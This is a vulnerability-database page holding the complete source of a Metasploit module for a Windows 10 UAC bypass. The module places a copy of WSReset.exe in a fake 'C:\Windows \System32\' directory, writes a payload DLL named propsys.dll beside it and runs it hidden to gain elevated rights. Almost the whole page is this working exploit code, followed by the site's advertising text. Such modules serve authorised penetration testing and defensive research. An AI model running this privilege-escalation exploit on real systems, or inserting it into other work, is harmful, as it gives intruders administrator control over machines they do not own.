Vulners
Lucene search
Microsoft Windows 10 UAC Protection Bypass Via Windows Store
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Post::Windows::Priv
include Post::Windows::Runas
def initialize(info = {})
super(
update_info( info,
'Name' => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)',
'Description' => %q{
This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool
is run with the "autoElevate" property set to true, however it can be moved to
a new Windows directory containing a space (C:\Windows \System32\) where, upon
execution, it will load our payload dll (propsys.dll).
},
'License' => MSF_LICENSE,
'Author' => [
'ACTIVELabs', # discovery
'sailay1996', # poc
'timwr', # metasploit module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [[ 'Automatic', {} ]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'EXITFUNC' => 'process',
'WfsDelay' => 15
},
'DisclosureDate' => 'Aug 22 2019',
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
},
'References' => [
['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
['URL', 'https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e'],
],
)
)
end
def check
if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
end
# Make sure we have a sane payload configuration
if sysinfo['Architecture'] != payload.arch.first
fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target')
end
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
exploit_win_dir = "C:\\Windows \\"
exploit_dir = "C:\\Windows \\System32\\"
exploit_file = exploit_dir + "WSReset.exe"
unless exists? exploit_win_dir
print_status("Creating directory '#{exploit_win_dir}'...")
session.fs.dir.mkdir(exploit_win_dir)
end
unless exists? exploit_dir
print_status("Creating directory '#{exploit_dir}'...")
session.fs.dir.mkdir(exploit_dir)
end
unless exists? exploit_file
session.fs.file.copy("C:\\Windows\\System32\\WSReset.exe", exploit_file)
end
payload_dll = "C:\\Windows \\System32\\propsys.dll"
print_status("Creating payload '#{payload_dll}'...")
payload = generate_payload_dll
write_file(payload_dll, payload)
print_status("Executing WSReset.exe...")
begin
session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, {'Hidden' => true})
rescue ::Exception => e
print_error(e.to_s)
end
print_warning("This exploit requires manual cleanup of the '#{exploit_win_dir}' and '#{exploit_dir}' directories!")
end
def check_permissions!
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
end
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
# is_in_admin_group can be nil, true, or false
print_status('UAC is Enabled, checking level...')
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
else
if admin_group
print_good('Part of Administrators group! Continuing...')
else
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Sep 2019 00:00Current
0.2Low risk
Vulners AI Score0.2